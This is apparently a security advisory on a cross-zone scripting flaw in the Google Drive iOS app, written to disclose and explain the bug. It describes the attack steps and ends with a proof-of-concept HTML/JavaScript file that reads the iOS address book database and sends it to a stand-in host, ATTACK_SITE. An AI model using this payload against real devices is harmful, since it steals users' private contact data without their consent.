Google Drive iOS App Cross-Zone Scripting

A significant feature of the Google Drive app is allowing a user to view either his files or files shared with him. The Google Drive app achieves this by using an embedded browser (using the UIWebView class) to display the contents of these files. Although many file types can be viewed using the embedded browser, some file types cannot - possibly for security reasons. For instance, when a user attempts to view the contents of a file with a TXT extension the embedded browser displays the contents of that file. However, if the user attempts to view an HTML file, the Google Drive application displays the error message: “Unable to open file”, and the HTML file is not rendered.

To circumvent this restriction on rendering HTML files, an attacker can:

1. Share an innocuous file with the victim. An empty TXT file will suffice.
2. Trick the victim into viewing that file, by going to the “Shared with me” screen in the Google Drive app.
3. Change the shared file extension from TXT to HTML, and then insert maliciously crafted HTML/JavaScript content.
4. Convince the victim to view the TXT file again (without refreshing the “Shared with me” view).

Since the Google Drive app still “believes” the file to be a TXT file, it renders it using the embedded browser. However, the UIWebView now renders the newly downloaded and locally stored HTML content. This has two side effects: 1.JavaScript code contained in the HTML file is automatically executed.

1. The HTML content is loaded in a privileged “file” zone, as opposed to an unprivileged HTTP location. Execution of malicious JavaScript code allows an attacker to steal potentially valuable information from the DOM of the embedded browser, an attack dubbed “Cross-Application Scripting” (XAS). However, because Google Drive loads the HTML file from a privileged zone this malicious JavaScript can also access the file system with the same permissions as the Google Drive app.

Proof-of-Concept

The following PoC illustrates a malicious HTML file that steals the user’s iPhone/iPad address book:

<html>
<head>
    <title>Malicious HTML File!</title>
</head>
<body>
    <script>
        function readGoogleDriveFileiOS(fileName) {
            // Create a new XHR Object
            x = new XMLHttpRequest();
            // When file content is available, send it back
            x.onreadystatechange = function () {
                if (x.readyState == 4) {
                    x2 = new XMLHttpRequest();
                    x2.onreadystatechange = function () {};
                    // x.responseText contains the content of fileName
                    // which we’ll send back to ATTACK_SITE
                    x2.open("GET", "http://ATTACK_SITE/?file_content=" +
                    encodeURI(x.responseText));
                    x2.send();
                }
            }
            // Try to read the content of the specified file
            x.open("GET", fileName);
            x.send();
        };
        // Reads the user’s address book
        readGoogleDriveFileiOS("file:///var/mobile/Library/AddressBook/
        AddressBook.sqlitedb");
    </script>
    <h1>This malicious file will now leak the user’s address book!</h1>
    </body>
</html>